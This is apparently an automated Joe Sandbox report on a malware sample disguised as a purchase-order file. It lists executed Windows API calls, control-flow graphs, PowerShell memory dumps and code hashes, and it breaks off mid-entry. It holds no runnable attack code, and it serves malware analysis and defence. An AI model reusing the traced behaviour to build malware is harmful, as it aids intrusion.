                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:72
                                        Total number of Limit Nodes:6
                                        execution_graph 15024 127d3e0 DuplicateHandle 15025 127d476 15024->15025 15026 127d198 15027 127d1de GetCurrentProcess 15026->15027 15029 127d230 GetCurrentThread 15027->15029 15030 127d229 15027->15030 15031 127d266 15029->15031 15032 127d26d GetCurrentProcess 15029->15032 15030->15029 15031->15032 15035 127d2a3 15032->15035 15033 127d2cb GetCurrentThreadId 15034 127d2fc 15033->15034 15035->15033 15036 1274668 15037 127467a 15036->15037 15038 1274686 15037->15038 15042 1274778 15037->15042 15047 1274210 15038->15047 15040 12746a5 15043 127479d 15042->15043 15051 1274879 15043->15051 15055 1274888 15043->15055 15048 127421b 15047->15048 15063 1275c84 15048->15063 15050 127704f 15050->15040 15053 12748af 15051->15053 15052 127498c 15053->15052 15059 12744d4 15053->15059 15056 12748af 15055->15056 15057 12744d4 CreateActCtxA 15056->15057 15058 127498c 15056->15058 15057->15058 15060 1275918 CreateActCtxA 15059->15060 15062 12759db 15060->15062 15062->15062 15064 1275c8f 15063->15064 15067 1275cb4 15064->15067 15066 1277125 15066->15050 15068 1275cbf 15067->15068 15071 1275ce4 15068->15071 15070 1277202 15070->15066 15072 1275cef 15071->15072 15075 1275d14 15072->15075 15074 1277305 15074->15070 15076 1275d1f 15075->15076 15077 127860b 15076->15077 15081 127acb8 15076->15081 15078 1278649 15077->15078 15085 127cdaf 15077->15085 15078->15074 15090 127acf0 15081->15090 15093 127acdf 15081->15093 15082 127acce 15082->15077 15086 127cdd1 15085->15086 15087 127cdf5 15086->15087 15101 127d080 15086->15101 15105 127d07f 15086->15105 15087->15078 15096 127add9 15090->15096 15091 127acff 15091->15082 15094 127acff 15093->15094 15095 127add9 GetModuleHandleW 15093->15095 15094->15082 15095->15094 15097 127ae1c 15096->15097 15099 127adf9 15096->15099 15097->15091 15098 127b020 GetModuleHandleW 15100 127b04d 15098->15100 15099->15097 15099->15098 15100->15091 15102 127d08d 15101->15102 15104 127d0c7 15102->15104 15109 127b368 15102->15109 15104->15087 15106 127d08d 15105->15106 15107 127d0c7 15106->15107 15108 127b368 GetModuleHandleW 15106->15108 15107->15087 15108->15107 15110 127b373 15109->15110 15112 127dde0 15110->15112 15113 127d9a0 15110->15113 15112->15112 15114 127d9ab 15113->15114 15115 1275d14 GetModuleHandleW 15114->15115 15116 127de4f 15115->15116 15116->15112

                                        Executed Functions

                                        Function 0127D188 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0127D216
                                        • GetCurrentThread.KERNEL32 ref: 0127D253
                                        • GetCurrentProcess.KERNEL32 ref: 0127D290
                                        • GetCurrentThreadId.KERNEL32 ref: 0127D2E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 20f062b5a4236725675d3aa7c846c5d0e90b82d55ba0e6c2bbcae5d7a757c5ca
                                        • Instruction ID: 79c6fde58981c3840ab12b13a969ff098544265450e2546fc9fd29ccc3651a63
                                        • Opcode Fuzzy Hash: 20f062b5a4236725675d3aa7c846c5d0e90b82d55ba0e6c2bbcae5d7a757c5ca
                                        • Instruction Fuzzy Hash: 1D5166B4D1074A8FEB09DFA9D548BAEBBF2AF88314F208459D019A7390D7349944CF65
                                        Function 0127D198 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0127D216
                                        • GetCurrentThread.KERNEL32 ref: 0127D253
                                        • GetCurrentProcess.KERNEL32 ref: 0127D290
                                        • GetCurrentThreadId.KERNEL32 ref: 0127D2E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: c611fbfc96bb1aca2edd596c9bf9ce8dc0d979eb9c7315ed8f2a600daea4a655
                                        • Instruction ID: 0cc66805a767107021ca87bc8697e942de1b79fa948f63d494614f4ef7b58c83
                                        • Opcode Fuzzy Hash: c611fbfc96bb1aca2edd596c9bf9ce8dc0d979eb9c7315ed8f2a600daea4a655
                                        • Instruction Fuzzy Hash: 1D5175B0D0074A8FEB05DFAAD548BDEBBF1BF88314F208459E019A7260D734A944CF65
                                        Function 0127ADD9 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 44 127add9-127adf7 45 127ae23-127ae27 44->45 46 127adf9-127ae06 call 127a16c 44->46 47 127ae3b-127ae7c 45->47 48 127ae29-127ae33 45->48 53 127ae1c 46->53 54 127ae08 46->54 55 127ae7e-127ae86 47->55 56 127ae89-127ae97 47->56 48->47 53->45 100 127ae0e call 127b471 54->100 101 127ae0e call 127b480 54->101 55->56 58 127aebb-127aebd 56->58 59 127ae99-127ae9e 56->59 57 127ae14-127ae16 57->53 60 127af58-127b018 57->60 61 127aec0-127aec7 58->61 62 127aea0-127aea7 call 127a178 59->62 63 127aea9 59->63 95 127b020-127b04b GetModuleHandleW 60->95 96 127b01a-127b01d 60->96 65 127aed4-127aedb 61->65 66 127aec9-127aed1 61->66 64 127aeab-127aeb9 62->64 63->64 64->61 68 127aedd-127aee5 65->68 69 127aee8-127aef1 call 127a188 65->69 66->65 68->69 75 127aef3-127aefb 69->75 76 127aefe-127af03 69->76 75->76 77 127af05-127af0c 76->77 78 127af21-127af2e 76->78 77->78 80 127af0e-127af1e call 127a198 call 127a1a8 77->80 84 127af51-127af57 78->84 85 127af30-127af4e 78->85 80->78 85->84 97 127b054-127b068 95->97 98 127b04d-127b053 95->98 96->95 98->97 100->57 101->57
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0127B03E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 7575fc5baeb9d4216b928eb6db0ce7a3814c1638c06a617e4c96a6b14d2fafeb
                                        • Instruction ID: 2b8733d9cc29d1e955f6ab2573a597f4238a3b1f928ede4d3210cf72ab00d633
                                        • Opcode Fuzzy Hash: 7575fc5baeb9d4216b928eb6db0ce7a3814c1638c06a617e4c96a6b14d2fafeb
                                        • Instruction Fuzzy Hash: DB814570A10B069FE725DF29D4447ABBBF1BF88310F048A2DD18AD7A40D775E849CB91
                                        Function 012744D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 102 12744d4-12759d9 CreateActCtxA 105 12759e2-1275a3c 102->105 106 12759db-12759e1 102->106 113 1275a3e-1275a41 105->113 114 1275a4b-1275a4f 105->114 106->105 113->114 115 1275a51-1275a5d 114->115 116 1275a60 114->116 115->116 117 1275a61 116->117 117->117
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 012759C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 5941e1a09e412721137fb4607e84530e511fdc0cf512fa0aa676dfe05acf8f52
                                        • Instruction ID: 097820dd7ddfb488d6614ff5cde40ff172450c2d714e59fa2504880c152d2337
                                        • Opcode Fuzzy Hash: 5941e1a09e412721137fb4607e84530e511fdc0cf512fa0aa676dfe05acf8f52
                                        • Instruction Fuzzy Hash: D541CFB0D10719CBEB24DFAAC88478EFBB5AF49704F60806AD408AB251DB755945CF90
                                        Function 0127590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 119 127590d-12759d9 CreateActCtxA 121 12759e2-1275a3c 119->121 122 12759db-12759e1 119->122 129 1275a3e-1275a41 121->129 130 1275a4b-1275a4f 121->130 122->121 129->130 131 1275a51-1275a5d 130->131 132 1275a60 130->132 131->132 133 1275a61 132->133 133->133
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 012759C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 555f0db15a43ae7e2f3d44934f87bb78b39d8f82d62aceea182e99119d6e7cf6
                                        • Instruction ID: 7f52631812e5ad4f3916d23d1202e4fd45003d2483307886c60a75d0a6ecb448
                                        • Opcode Fuzzy Hash: 555f0db15a43ae7e2f3d44934f87bb78b39d8f82d62aceea182e99119d6e7cf6
                                        • Instruction Fuzzy Hash: 8641BEB0C00719CFEB25DFAAC884BDEBBB5AF48304F60806AD408AB251DB755946CF90
                                        Function 0127D3E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 135 127d3e0-127d474 DuplicateHandle 136 127d476-127d47c 135->136 137 127d47d-127d49a 135->137 136->137
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0127D467
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 3fdb5e2da129264d4fb4b615083919b4e61ba9d7f03f26529f1aa96be26fe33e
                                        • Instruction ID: 6fb4e989f8d9c27a64f4f4a21c922dcd64aeba965005c73bf5aa9d16ed757177
                                        • Opcode Fuzzy Hash: 3fdb5e2da129264d4fb4b615083919b4e61ba9d7f03f26529f1aa96be26fe33e
                                        • Instruction Fuzzy Hash: A821C4B5900249DFDB10CFAAD884ADEBBF5EB48310F14841AE914A3350D374A944CFA5
                                        Function 0127D3D9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 140 127d3d9-127d474 DuplicateHandle 141 127d476-127d47c 140->141 142 127d47d-127d49a 140->142 141->142
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0127D467
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: d2f4d18c56ef8060aa34d3ae7f020b5929a368a89db4aea3e33bb1a8d7c4b8d0
                                        • Instruction ID: bb33300a22d0e520f84b521f7d50d2d390d27d7c4c82abc08c92e0de1227f506
                                        • Opcode Fuzzy Hash: d2f4d18c56ef8060aa34d3ae7f020b5929a368a89db4aea3e33bb1a8d7c4b8d0
                                        • Instruction Fuzzy Hash: 9921B0B5D00249DFDB10CFAAD984ADEBBF5EB48214F14841AE918A3250D378A944CFA0
                                        Function 0127AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 145 127afd8-127b018 146 127b020-127b04b GetModuleHandleW 145->146 147 127b01a-127b01d 145->147 148 127b054-127b068 146->148 149 127b04d-127b053 146->149 147->146 149->148
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0127B03E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 726b51cc35fd7fff223b44432ad4277567e20ffe3e6ba5ac74a8d96064de3253
                                        • Instruction ID: e17e4fbad567a364522a8814e4ab0460cac39972c91739a1e818760b7c8b0daf
                                        • Opcode Fuzzy Hash: 726b51cc35fd7fff223b44432ad4277567e20ffe3e6ba5ac74a8d96064de3253
                                        • Instruction Fuzzy Hash: FB110FB5C0064A8FDB24CF9AD844BDEFBF4AB88214F10841AD528A7200D379A545CFA1
                                        Function 0122D1D4 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754443117.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_122d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 640d10ca97f01b54944f3097aa10765dab41222ae6e0d7470723cef6be699daa
                                        • Instruction ID: 90693d5527df14e084f79f05d0d32633113393cccb80423e1a85e9b870044317
                                        • Opcode Fuzzy Hash: 640d10ca97f01b54944f3097aa10765dab41222ae6e0d7470723cef6be699daa
                                        • Instruction Fuzzy Hash: 83213471514348EFEB05DF94C9C0B2ABBA5FB85324F20C66DE9094B243C37AD806CA61
                                        Function 0122D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754443117.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_122d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92eeb4fbb6b98a909503179a1caf4f0261803fd8caa515dd084170673667dd15
                                        • Instruction ID: 78928e80b43e63ae13eedc213c49bb136fd1de5675eb36b6bdf355c3ff780636
                                        • Opcode Fuzzy Hash: 92eeb4fbb6b98a909503179a1caf4f0261803fd8caa515dd084170673667dd15
                                        • Instruction Fuzzy Hash: EA212271614348EFDB15DF64D880B1ABBA1FB84314F20C56DE94A4B2A2C77AD507CA62
                                        Function 0122D006 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754443117.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_122d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f8a135974f431290955a492c3d283116a1144a10c4522918b52f91661e2822a
                                        • Instruction ID: 161daf097503eee97756b53f168da3f0f1397ff9b7059a38669f0a259ad79f44
                                        • Opcode Fuzzy Hash: 9f8a135974f431290955a492c3d283116a1144a10c4522918b52f91661e2822a
                                        • Instruction Fuzzy Hash: D221B0714083849FCB02CF24D994715BF71EB46314F28C5EAD9498F2A7C33A980ACB62
                                        Function 0122D1CF Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754443117.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_122d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction ID: 6685d5b7e6749a598c9793a987f9e1fa0cebf28b08a76753e149d361dd49afe0
                                        • Opcode Fuzzy Hash: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction Fuzzy Hash: A511BB75504284EFDB02CF54C5C0B19FBB1FB85224F24C6A9D9494B697C33AD44ACB61
                                        Function 0121D759 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754387348.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_121d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1fc4d4ba9362ce23867c6d17944f6055a8bec54cf83fe31ffad8ade02b3cd9a3
                                        • Instruction ID: facf5de510189a57958545445229457a7db84622010400176586ce259ecacb39
                                        • Opcode Fuzzy Hash: 1fc4d4ba9362ce23867c6d17944f6055a8bec54cf83fe31ffad8ade02b3cd9a3
                                        • Instruction Fuzzy Hash: 2A01DB71114789DFF728DAA5DC88B67FBD8EF51624F18C41AEE090A28AC3799441CAB1
                                        Function 0121D758 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754387348.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_121d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97b5580370157a3aa9fd00e02504c959aed1201d69be35daaaafed28e8b59995
                                        • Instruction ID: 37b9f6eec44afc94b7f1aed9ce7a59f3dd94b9a740c30ce10a2c74a0141731da
                                        • Opcode Fuzzy Hash: 97b5580370157a3aa9fd00e02504c959aed1201d69be35daaaafed28e8b59995
                                        • Instruction Fuzzy Hash: 24F0C271004385AEE7248A1ACC88B66FFE8EF51624F18C45AEE080B286C3799840CAB1

                                        Non-executed Functions

                                        Function 0127DC7C Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: de51dad98fa09e544dd126ffc13d698fb7b01ace955dffc756d5f51185957e80
                                        • Instruction ID: 74c406a5309f03b13636382ee2058463555f4798a5a3a6a4b431325bfd9523e7
                                        • Opcode Fuzzy Hash: de51dad98fa09e544dd126ffc13d698fb7b01ace955dffc756d5f51185957e80
                                        • Instruction Fuzzy Hash: 04A19E32E2020A8FCF15DFB4D9449EEBBB2FF85300B15856AE915AB255DB71E906CB40

                                        Executed Functions

                                        Function 07B72C98 Relevance: .6, Instructions: 593COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1778881489.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7b70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56f61478a42915fe7dbf095a5ca2e89779be6c7f3e6a73872f77b163c47f5137
                                        • Instruction ID: ad50dbaa0bf1176961541f07c6cf8ee7d2ed45e344a4d71b807a995b4d743082
                                        • Opcode Fuzzy Hash: 56f61478a42915fe7dbf095a5ca2e89779be6c7f3e6a73872f77b163c47f5137
                                        • Instruction Fuzzy Hash: 011225F1B043469FEB259A7888017AABBF2EFC1610F1484EAD526CF251DB31C941CBA1
                                        Function 04CF7890 Relevance: .4, Instructions: 362COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aac2d59e7d3850dcab28219c6a5aab5de51a66d243129468b83d37f8884316f3
                                        • Instruction ID: 6d32ef0213b36dcd43d9255a8e0cb51cc6a4b496a4031167c2e35b534326a172
                                        • Opcode Fuzzy Hash: aac2d59e7d3850dcab28219c6a5aab5de51a66d243129468b83d37f8884316f3
                                        • Instruction Fuzzy Hash: 06E16C34A01208DFDB55DF98D884A9DFBB2FF89310F258159E945AB361C735EE82CB90
                                        Function 04CF29F0 Relevance: .2, Instructions: 209COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44d6869a9662f6f5d48cd1f8e2bd6c20fa1e3ecd7da4d84f9587b6abb4cbe61a
                                        • Instruction ID: 7b294ddae08856947f2e840621e95273d0ffc0756e463bf7d61c3e39b952fb7a
                                        • Opcode Fuzzy Hash: 44d6869a9662f6f5d48cd1f8e2bd6c20fa1e3ecd7da4d84f9587b6abb4cbe61a
                                        • Instruction Fuzzy Hash: DD919F74A002058FCB19CF58C894AAEFBB2FF48310B2585A9D955EB365C736FC51CBA0
                                        Function 07B72C7D Relevance: .1, Instructions: 137COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1778881489.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7b70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ebe85edc3dfa033465b29f3b917f1a10cbe680623a7ee0dd2a188cf04cb3184
                                        • Instruction ID: ab9d153174a6231c9b2f0e39c156498e01e16ca0d0cfa1b301b4c33e9f691d54
                                        • Opcode Fuzzy Hash: 7ebe85edc3dfa033465b29f3b917f1a10cbe680623a7ee0dd2a188cf04cb3184
                                        • Instruction Fuzzy Hash: 454102F1A002029FEB249E68C940BE67BB2FF85350F1884EAD9248F251D731D981CBA1
                                        Function 04CF2B00 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9228a55de9df40eabd9c918a8c67ebddc1b477c6fe5ebe30d3e3423c455123f5
                                        • Instruction ID: 76d609c1f1f63700c9493e318532e924144484e7dce9e4210baec48c8a6e487c
                                        • Opcode Fuzzy Hash: 9228a55de9df40eabd9c918a8c67ebddc1b477c6fe5ebe30d3e3423c455123f5
                                        • Instruction Fuzzy Hash: F3415B74A006059FDB0ACF48C598AAEFBB2FF48310B118599D915AB364D736FD51CFA0
                                        Function 04CF6660 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b654cc24eb715af74a2b6407d71a9a142c659662b7993c7be1e63250e109bc5
                                        • Instruction ID: e7b5b4478e3fb3fe09d18d32d5c5dcc930a91624ce0508ce54fc76ddb43c2d1b
                                        • Opcode Fuzzy Hash: 7b654cc24eb715af74a2b6407d71a9a142c659662b7993c7be1e63250e109bc5
                                        • Instruction Fuzzy Hash: C531BC74A046069FCB04DF58C994AAAFBB1FF49310B14819AD558DB3A2CB35FC42CBA0
                                        Function 04CF6650 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f6841a9c066d3607bcc629838276fa8484acd5c4a043d0eb0ebd64dfdfc626f
                                        • Instruction ID: b11989f583387487dd5dd38c4c785cd6cb7c7a95b9431470f3fddd3acda71fe7
                                        • Opcode Fuzzy Hash: 0f6841a9c066d3607bcc629838276fa8484acd5c4a043d0eb0ebd64dfdfc626f
                                        • Instruction Fuzzy Hash: A9213474A046069FCB04CF58C994AAAFBF1FF88310B248599D919EB711C735FC82CBA0
                                        Function 033AD006 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761002748.00000000033AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033AD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_33ad000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 296ce930bd9cb14e97493f35b1bb96088e6ff87b5271b3b0da90d2bd7dc7427c
                                        • Instruction ID: b66ff043c9edae74395e5de7938d4434eba928bf2863f72f095b32879c2d7e6f
                                        • Opcode Fuzzy Hash: 296ce930bd9cb14e97493f35b1bb96088e6ff87b5271b3b0da90d2bd7dc7427c
                                        • Instruction Fuzzy Hash: 9C018C6140D7C05FD7128B298CA4752BFB8EF43620F0D80CBE8888F5A7C2685C45CB72
                                        Function 033AD01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761002748.00000000033AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033AD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_33ad000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9453bd52114ea9e1575bc1aabcd3a7fe9c320e88f672685712978c18eb2012c8
                                        • Instruction ID: ee704e3d4aa7a82355d7f7bfa4993fc5c8acba551e913b01cc0a6ad0379cf380
                                        • Opcode Fuzzy Hash: 9453bd52114ea9e1575bc1aabcd3a7fe9c320e88f672685712978c18eb2012c8
                                        • Instruction Fuzzy Hash: 3D01A271504B409EE710CA29CDD4B67FBDCEF82624F18C45AED484BA42C37D9841DAB2

                                        Non-executed Functions

                                        Function 07B722C8 Relevance: 8.0, Strings: 6, Instructions: 469COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
